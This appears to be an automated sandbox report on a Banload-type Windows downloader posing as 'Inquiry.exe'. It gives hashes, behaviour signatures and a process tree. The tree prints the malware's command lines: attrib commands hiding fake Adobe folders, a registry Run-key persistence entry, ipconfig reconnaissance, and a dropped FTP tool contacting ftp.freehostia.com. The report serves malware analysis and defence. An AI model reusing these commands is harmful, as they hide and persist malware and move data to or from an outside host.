Analysis
-
max time kernel
10s -
max time network
24s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system -
submitted
27-05-2024 19:33
Static task
static1
Behavioral task
behavioral1
Sample
Inquiry.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
Inquiry.exe
Resource
win10v2004-20240426-en
Errors
General
-
Target
Inquiry.exe
-
Size
2.3MB
-
MD5
7bf8e2064a035d6d6162a5c8f616812c
-
SHA1
402d7116983dd6d79f3eeeb3c3f6ad116ffa5669
-
SHA256
5a1232280d7c0f8298f4d1f33eeaac6ebe4deea654b14367e779a0a7e7ebce8f
-
SHA512
96b235bfcc9651ed50cd7aba365a3bc819434b144ba3eb982a3920db45d5d5d7d53c31e205944f42af9129986b41b57ad128ea5e3d9cc66898a68aebe0805fc8
-
SSDEEP
49152:Iggs8ABpNAcbBicST5ZlL9/5ga/sKvnP+BQzeEbUJJk8Lq1v2BvA78:IVs8AvNzsl12j20EJGqN2mI
Malware Config
Signatures
-
Banload
Banload variants download malicious files, then install and execute the files.
-
Sets file to hidden 1 TTPs 5 IoCs
Modifies file attributes to stop it showing in Explorer etc.
pid Process 4284 attrib.exe 1564 attrib.exe 3152 attrib.exe 1652 attrib.exe 4864 attrib.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate adbr01.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion adbr01.exe -
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation Inquiry.exe Key value queried \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation WScript.exe -
Executes dropped EXE 3 IoCs
pid Process 3364 Adobeta.exe 2620 adbr01.exe 588 adbr01.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AdobeA = "C:\\Users\\Admin\\AppData\\Roaming\\Adobe\\Adobe Inc\\AdobeRead\\acro3.bat" reg.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Enumerates system info in registry 2 TTPs 1 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe -
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
pid Process 2768 ipconfig.exe -
Modifies registry class 3 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings Inquiry.exe Key created \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187} adbr01.exe -
Suspicious use of WriteProcessMemory 47 IoCs
description pid Process procid_target PID 2976 wrote to memory of 752 2976 Inquiry.exe 82 PID 2976 wrote to memory of 752 2976 Inquiry.exe 82 PID 2976 wrote to memory of 752 2976 Inquiry.exe 82 PID 752 wrote to memory of 2988 752 WScript.exe 84 PID 752 wrote to memory of 2988 752 WScript.exe 84 PID 752 wrote to memory of 2988 752 WScript.exe 84 PID 2988 wrote to memory of 3900 2988 cmd.exe 93 PID 2988 wrote to memory of 3900 2988 cmd.exe 93 PID 2988 wrote to memory of 3900 2988 cmd.exe 93 PID 2988 wrote to memory of 4864 2988 cmd.exe 94 PID 2988 wrote to memory of 4864 2988 cmd.exe 94 PID 2988 wrote to memory of 4864 2988 cmd.exe 94 PID 2988 wrote to memory of 1652 2988 cmd.exe 95 PID 2988 wrote to memory of 1652 2988 cmd.exe 95 PID 2988 wrote to memory of 1652 2988 cmd.exe 95 PID 2988 wrote to memory of 3152 2988 cmd.exe 96 PID 2988 wrote to memory of 3152 2988 cmd.exe 96 PID 2988 wrote to memory of 3152 2988 cmd.exe 96 PID 2988 wrote to memory of 4284 2988 cmd.exe 97 PID 2988 wrote to memory of 4284 2988 cmd.exe 97 PID 2988 wrote to memory of 4284 2988 cmd.exe 97 PID 2988 wrote to memory of 1564 2988 cmd.exe 98 PID 2988 wrote to memory of 1564 2988 cmd.exe 98 PID 2988 wrote to memory of 1564 2988 cmd.exe 98 PID 2988 wrote to memory of 384 2988 cmd.exe 99 PID 2988 wrote to memory of 384 2988 cmd.exe 99 PID 2988 wrote to memory of 384 2988 cmd.exe 99 PID 384 wrote to memory of 2992 384 WScript.exe 100 PID 384 wrote to memory of 2992 384 WScript.exe 100 PID 384 wrote to memory of 2992 384 WScript.exe 100 PID 2992 wrote to memory of 3364 2992 cmd.exe 102 PID 2992 wrote to memory of 3364 2992 cmd.exe 102 PID 2992 wrote to memory of 3364 2992 cmd.exe 102 PID 2992 wrote to memory of 5112 2992 cmd.exe 103 PID 2992 wrote to memory of 5112 2992 cmd.exe 103 PID 2992 wrote to memory of 5112 2992 cmd.exe 103 PID 2992 wrote to memory of 2768 2992 cmd.exe 104 PID 2992 wrote to memory of 2768 2992 cmd.exe 104 PID 2992 wrote to memory of 2768 2992 cmd.exe 104 PID 2992 wrote to memory of 2620 2992 cmd.exe 105 PID 2992 wrote to memory of 2620 2992 cmd.exe 105 PID 2992 wrote to memory of 2620 2992 cmd.exe 105 PID 2620 wrote to memory of 588 2620 adbr01.exe 106 PID 2620 wrote to memory of 588 2620 adbr01.exe 106 PID 2620 wrote to memory of 588 2620 adbr01.exe 106 PID 2620 wrote to memory of 588 2620 adbr01.exe 106 PID 2620 wrote to memory of 588 2620 adbr01.exe 106 -
Views/modifies file attributes 1 TTPs 5 IoCs
pid Process 4284 attrib.exe 1564 attrib.exe 3152 attrib.exe 1652 attrib.exe 4864 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Inquiry.exe"C:\Users\Admin\AppData\Local\Temp\Inquiry.exe"1⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2976 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\Adobedc.vbs"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:752 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\Adob03.bat" /quiet /passive /norestart"3⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2988 -
C:\Windows\SysWOW64\xcopy.exexcopy /y /h /e /r /k /c *.* "C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\"4⤵
- Enumerates system info in registry
PID:3900
-
-
C:\Windows\SysWOW64\attrib.exeattrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead"4⤵
- Sets file to hidden
- Views/modifies file attributes
PID:4864
-
-
C:\Windows\SysWOW64\attrib.exeattrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\Adobe Reader\AdobeR"4⤵
- Sets file to hidden
- Views/modifies file attributes
PID:1652
-
-
C:\Windows\SysWOW64\attrib.exeattrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\Adobe Reader\ADBR\READER"4⤵
- Sets file to hidden
- Views/modifies file attributes
PID:3152
-
-
C:\Windows\SysWOW64\attrib.exeattrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER"4⤵
- Sets file to hidden
- Views/modifies file attributes
PID:4284
-
-
C:\Windows\SysWOW64\attrib.exeattrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\AdobeR"4⤵
- Sets file to hidden
- Views/modifies file attributes
PID:1564
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\Adob9.vbs"4⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:384 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\rea01.bat" /quiet /passive /norestart"5⤵
- Suspicious use of WriteProcessMemory
PID:2992 -
C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\Adobeta.exeAdobeta.exe -a -c -d -natpasv -s:01.klm ftp.freehostia.com -s6⤵
- Executes dropped EXE
PID:3364
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "AdobeA" /t REG_SZ /F /D "C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\acro3.bat"6⤵
- Adds Run key to start application
PID:5112
-
-
C:\Windows\SysWOW64\ipconfig.exeipconfig /all6⤵
- Gathers network information
PID:2768
-
-
C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exeadbr01.exe -f "011.011"6⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2620 -
C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exeadbr01.exe -f "011.011"7⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Modifies registry class
PID:588
-
-
-
C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr02.exeadbr02.exe -f "112.112"6⤵PID:4972
-
C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr02.exeadbr02.exe -f "112.112"7⤵PID:636
-
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
135B
MD537e51be074f6e9fb889cc6d236eac067
SHA161a8e92c71668dd41b1d532d2466c0fe507c403a
SHA25607ed3ee991e64cd2d495ad78876585d18a4cb831f89507b5a268ef47451132f4
SHA512d414e9b57ba526da18eca43a008e8a292b0b6c27f5ca075e02f217d986dab9c56e490848b436ccffb72a4fef3e6a4fd1ae0efc6a8ff0cef76e43253e842b0613
-
Filesize
4B
MD54ce4d01ccc41c2e73643c40abe61aa58
SHA12dcb3b58de4e71a1febd32f789d5fb36de11cadd
SHA25609813ea33c87d6d2a4dec3c294c7c0a28a223b138f8fecb40450d696d8a3fced
SHA512f54f35d5ed2a2d97a932f7713d80b754233fdc2f343cf79460f1fd3c23363fa418dcc0250ac6826df3dc5754dda0a5ad05c8705603392d2e0ecebb7b2904cbef
-
Filesize
118B
MD5c69fb6b170a6abfb965777713ff229c1
SHA1d43a2aa2d68a7a18453ea197a679be7763af859c
SHA256bd703a3de33ffa87e8df571b0365ef6cda20a45b20c8825c2edc2a7a227aeb19
SHA5124a207ac8829e6ba22f4914575c9ce3c0fe7792cd0720bab9717d04008b72c84fb6422ad3106f2f52fa4e3b21a5e697a347ec11558f2b18955e4312002bc8abfe
-
Filesize
124KB
MD51a1075e5e307f3a4b8527110a51ce827
SHA1f453838ed21020b7ca059244feea8579e5aa74ef
SHA256ddd90e3546e95b0991df26a17cf26fa2f1c20d6a1fd4ffccf1e9b3ec3d3810d5
SHA512b6b70c6cb3cdb05a69c75b86c1fa0fadb38de0391e1fa17daff7d12dfae2a9f483546d9bf1001ff622694fdf8a28b85cd30fc541c25be62df022d22ca17decc1
-
Filesize
560B
MD5481435bcf75055098596cd7eae7a04bd
SHA13089a8aebb1a199d886fddb1a416903a1172d4b3
SHA256261a0c0c76fb08f6b57aaad7fce12c485e00a5ecaac401dc10cb25d225bd8363
SHA512a1174877296c771f13c726576650024bb63d845bb6b6654994cea387d9b4dddff09167e24e596e0d44424997ec422a456c9366ec998b5dcce5d1b5540ee5f7b8
-
Filesize
186B
MD509082253605a7171f078e26dc308a667
SHA1585286c9fcda5e66e7fdb4e17a7bab6160183d46
SHA256f4c67dc01ce4bf55e1b574009c49d481dad0d33070f53f42bc76807eb5e324ed
SHA512adb4a1fec6feada14b8b4f28730e098a0af19f1e7c2fa0fe684030d1171e56c88813661a2352ce598221853fce3dc8a4bb3b2e1dc80b6471c41d2598f635b1d8
-
Filesize
189B
MD5ce8041824149d8266dbb0ad9688224d7
SHA13ab653c43ce66681ceaab90193e1a4c95d998090
SHA2560a697bf8507b3f517afe7d67ed0f12f1a8d0edbb72252d75cc7677d6e2e638c5
SHA512e1a205a1665fe5beb3c53cdcff4eb9c66a4773d730215ff87a179f3c825d342f8f7e8b5e65e45e6a1f13dfe7f58a09f5a920ce9416fe231d74ad1d99e60bd21d
-
Filesize
256KB
MD597b8dbcc7b3cc290aef4241df911ac2e
SHA1733ababbcd278821d4e3ee78580841981f26642e
SHA256c44ca1fe145c4f0dcea4efb95171cbf16dfec9fe66a603fbe29c94c21050a023
SHA5124adaa7621e2c858e6541792146260142e1d28683ec1515a743a56bc106ab425edfce856ef3b0d146d63704b34694c9e666a39e3845a097d41cbf465537ec9b25
-
Filesize
140B
MD56f94e6edb06f44229e66f7a3d1ae0966
SHA1997b74fa1beb2791f98177457636d9ce9b30ed4f
SHA2564a4ba15d7a91c61de1cee9d00bd9db6f6d7e63e920dd2833878a46ea57b03f1b
SHA512a2a3d2aa0176e76d46f8a79370ed588ab74b3fb4ca931a6f71e0c34f4561531d62f4da89284ac8cf42ce2e29b18dcc4f7c4d56625e93d2a6e64c082887c6350f
-
Filesize
2.1MB
MD531b2af509754d527a4c2a5cc1b2ad970
SHA1cc737999c1dfeab2dcbe4178118281ff7757db2d
SHA2568d464baad77e60770bacd2d33f7344d08a34a3b3c63a361f9e61f8fec7bef6e9
SHA512a6f1d4daecc61efe555e51a56147a04dfd4dbe4be00a110d4a7cf5f1b3edd17ac5f063a3b3dd9708cde01b8dc04c1526b226186870317746f8899388b6961c8d
-
Filesize
2.1MB
MD5b7884b9cd90c13f6b55c43404d893237
SHA1ccf856935b6c9d248e39b0885c641b803b4c7f1f
SHA2560fdc310a86ecb105cb056774c78f1699fedd764782bf45a011161544f4857ac8
SHA5127dddf3d655a581d57c70c8954308ea1a0a536b04cb1902ea53bc021429b0d81ed36ded4c39c297a17cfd8f33095be581a00f71a23a67c625d0212851d11d1dc1
-
Filesize
1KB
MD5ccf4c9a64c1fbf3818b0ca8f0644de4f
SHA15ff1fd81f9170ed5d3a59487e11cc96560d579bc
SHA256622015abe90dd6b324a4d7b1034165d47f93a5d0572263a9eb067b0e374ee278
SHA51214b2e6877c215f771ecc38028ec94eb4bfe441093e527184be390e1f9829e2c943c80c86d6bd5f605bbbfc2f5cccaf908959a98184982c76dbc1ca4e946df6c0